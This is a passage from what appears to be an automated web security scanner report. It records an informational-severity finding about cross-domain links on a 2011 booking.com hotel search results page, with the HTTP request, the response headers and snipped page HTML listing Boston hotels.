...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/162/1621334.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/162/1621334.jpg' /><br /><strong>Inn on Broadway, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 698" /> Double US$ 698

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 778" /> Group US$ 778


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The location was great! Lots of places to eat and see in walking distance. Awesome coffee shop(Notes from the Underground) and mini mart right down the road. A beautiful old church right out our window and a large community deck off the second floor to enjoy a nice evening on.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Janel, Beaverton, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/broadway-manor-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...

19.183. http://www.booking.com/searchresults.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<link rel="stylesheet" type="text/css" href="http://r.bstatic.com/static/css/searchresults.1191.css" media="screen" />


<style type="text/css">
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel in Boston U.S.A." />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
</select>

<img id="radiusImg" alt="" class="help jq_tooltip use_sprites icon_info" src="http://s.bstatic.com/static/img/transparent.png" width="14" height="14" rel="200" title="You can select a distance to search for hotels in the nearby area" />

</h4>
...[SNIP]...
<div id="homein" >

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
gt;" href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Copley Square Hotel" style="top: 0;" />

</a>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />
<span class="hideme">
...[SNIP]...
r&gt;" href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X2">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="The Liberty Hotel, A Luxury Collection Hotel" style="top: -88px;" />

</a>
...[SNIP]...
<a href="/hotel/us/the-liberty.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X2"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
/us/courtyard-boston-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X3">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Courtyard Boston Logan Airport" style="top: -176px;" />

</a>
...[SNIP]...
/hotel/us/courtyard-boston-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X3"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
t;" href="/hotel/us/copley-mariott.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X4">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Boston Marriott Copley Place" style="top: -264px;" />

</a>
...[SNIP]...
<a href="/hotel/us/copley-mariott.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X4"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
ef="/hotel/us/hilton-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X5">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Hilton Boston Logan Airport" style="top: -352px;" />

</a>
...[SNIP]...
<a href="/hotel/us/hilton-logan-airport.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X5"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
br&gt;" href="/hotel/us/harborside.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X6">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Harborside Inn" style="top: -440px;" />

</a>
...[SNIP]...
<a href="/hotel/us/harborside.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X6"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
/hotel/us/mandarin-oriental-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X7">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Mandarin Oriental Boston" style="top: -528px;" />

</a>
...[SNIP]...
href="/hotel/us/mandarin-oriental-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X7"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
ref="/hotel/us/westin-copley-place.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X8">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Westin Copley Place" style="top: -616px;" />

</a>
...[SNIP]...
<a href="/hotel/us/westin-copley-place.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X8"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/r-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X9">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Ramada Boston" style="top: -704px;" />

</a>
...[SNIP]...
href="/hotel/us/r-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X9"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
hotel/us/best-western-terrace-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X10">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Best Western Terrace Inn Boston" style="top: -792px;" />

</a>
...[SNIP]...
ref="/hotel/us/best-western-terrace-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X10"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
&gt;" href="/hotel/us/days-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X11">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Days Hotel Boston" style="top: -880px;" />

</a>
...[SNIP]...
<a href="/hotel/us/days-boston.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X11"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
"/hotel/us/the-berkeley-residence.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X12">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="40 Berkeley" style="top: -968px;" />

</a>
...[SNIP]...
href="/hotel/us/the-berkeley-residence.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X12"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max3 jq_tooltip" width="43" height="10" title="Max people: 3" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max4 jq_tooltip" width="43" height="10" title="Max people: 4" alt="" />
<span class="hideme">
...[SNIP]...
otel/us/c-i-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X13">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Comfort Inn Boston" style="top: -1056px;" />

</a>
...[SNIP]...
ef="/hotel/us/c-i-boston-massachusettes.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X13"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
tel/us/hilton-boston-fin-district.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X14">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Hilton Boston Financial District" style="top: -1144px;" />

</a>
...[SNIP]...
f="/hotel/us/hilton-boston-fin-district.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X14"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
tel/us/boston-marriott-long-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X15">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Boston Marriott Long Wharf" style="top: -1232px;" />

</a>
...[SNIP]...
f="/hotel/us/boston-marriott-long-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X15"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
<div>
<img src="http://s.bstatic.com/static/img/transparent.png" class="occsprite max2 jq_tooltip" width="43" height="10" title="Max people: 2" alt="" />
<span class="hideme">
...[SNIP]...
ref="/hotel/us/the-farrington-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X16">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="The Farrington Inn" style="top: -1320px;" />

</a>
...[SNIP]...
